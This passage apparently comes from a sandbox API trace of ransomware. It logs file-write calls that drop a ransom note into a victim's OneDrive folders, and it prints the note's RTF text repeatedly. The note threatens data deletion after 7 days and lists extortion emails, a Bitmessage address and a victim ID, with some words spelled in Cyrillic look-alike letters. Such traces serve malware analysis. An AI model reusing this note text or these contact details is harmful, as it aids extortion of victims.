thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0299.056] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0299.057] CloseHandle (hObject=0x27c) returned 1 [0299.057] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls\\Styles\\Flat\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\controls\\styles\\flat\\#readme_eman#.rtf")) returned 0xffffffff [0299.057] GetLastError () returned 0x2 [0299.057] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls\\Styles\\Flat\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\qtquick\\controls\\styles\\flat\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0299.813] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 